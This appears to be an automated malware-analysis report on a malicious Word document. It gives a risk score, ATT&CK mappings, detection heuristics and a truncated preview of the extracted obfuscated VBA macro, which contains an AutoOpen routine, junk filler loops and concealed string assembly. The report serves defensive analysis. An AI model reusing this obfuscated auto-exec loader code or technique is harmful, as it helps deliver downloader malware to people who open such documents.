MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing obfuscated VBA macros, indicated by multiple critical and high severity heuristic firings including 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC'. The presence of an AutoOpen macro and GetObject calls suggests an attempt to automatically execute malicious code upon opening. The VBA script's obfuscated nature and use of execution sinks point towards a downloader or droppper functionality, likely intended to fetch and execute a second-stage payload.
Heuristics 8
-
ClamAV: Doc.Malware.Dwsv-6969094-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dwsv-6969094-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7691 bytes |
SHA-256: 77f9e7657f6fcc0a5b28176a1c06d6e0035cb630c7f30d26ed1299d173d07e68 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "c6_08_2"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "O4479138"
Attribute VB_Base = "0{7384A44C-0D9F-4B05-99C1-397051F31C0C}{0C0CD53F-06EC-4942-A886-6F16522FC1F0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "K751520"
Attribute VB_Name = "j36653"
Attribute VB_Name = "B761938"
Attribute VB_Name = "k22067"
Attribute VB_Name = "T584185"
Attribute VB_Base = "0{9B59553E-8DF6-4759-9AEE-EE62BC88E8F8}{BC7E9576-4F0E-46BD-94BD-0B83EE6D22AB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "U37936"
Function I21348_(A6_66500)
While O5076_01 And Q7533122
Close ("o_9_719")
Close ("O8745873")
Close ("572637499")
Close ("426475228")
Wend
While P_2_8021 And N16053
Close ("M284772")
Close ("M841912_")
Close ("996311077")
Close ("267674380")
Wend
Set I21348_ = CVar(A6_66500)
While T968497 And c716170
Close ("A951__3")
Close ("L414188")
Close ("289413535")
Close ("139420478")
Wend
While z_052679 And s9660319
Close ("a546_3_")
Close ("N06186")
Close ("578134735")
Close ("310711921")
Wend
While l38262 And a7216664
Close ("p8519965")
Close ("r295421")
Close ("407827300")
Close ("281538971")
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While m04481 And t662025
Close ("k9461067")
Close ("F22982")
Close ("915245856")
Close ("738609176")
Wend
While F759570 And H721876
Close ("T3_944")
Close ("W8839944")
Close ("266804217")
Close ("966793857")
Wend
While h_076__0 And d100632
Close ("w3210213")
Close ("s4_502__")
Close ("8497356")
Close ("32871551")
Wend
Call P86498
While M_814952 And i70_5_8
Close ("z1_44504")
Close ("J65181")
Close ("4823188")
Close ("382711466")
Wend
While b5345918 And Y6082297
Close ("j2538265")
Close ("z6_095_5")
Close ("698889889")
Close ("597923148")
Wend
End Sub
Attribute VB_Name = "q5049_9"
Function P86498()
On Error Resume Next
While H882808 And X4606_
Close ("K_883334")
Close ("Y5951620")
Close ("926572640")
Close ("648812385")
Wend
While a0084312 And F4932254
Close ("J17831")
Close ("P8026_")
Close ("117489036")
Close ("860536442")
Wend
N40123_1 = O4479138.f65590 + T584185.O7546837 + O4479138.f65590 + T584185.c0___794 + O4479138.f65590 + O4479138.f65590.Value + T584185.j27318 + O4479138.f65590.Text + O4479138.f65590.Tag + T584185.f760873 + O4479138.f65590.Tag + T584185.T819292 + O4479138.f65590.Text
While w_14473 And M62333
Close ("D60772_7")
Close ("O2__894")
Close ("504032362")
Close ("374344734")
Wend
While K232_4 And k4072688
Close ("F5320237")
Close ("G09187")
Close ("789448707")
Close ("654612179")
Wend
While L__73268 And U_635264
Close ("O25_31_")
Close ("U841436")
Close ("967293093")
Close ("672131045")
Wend
Set h7
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.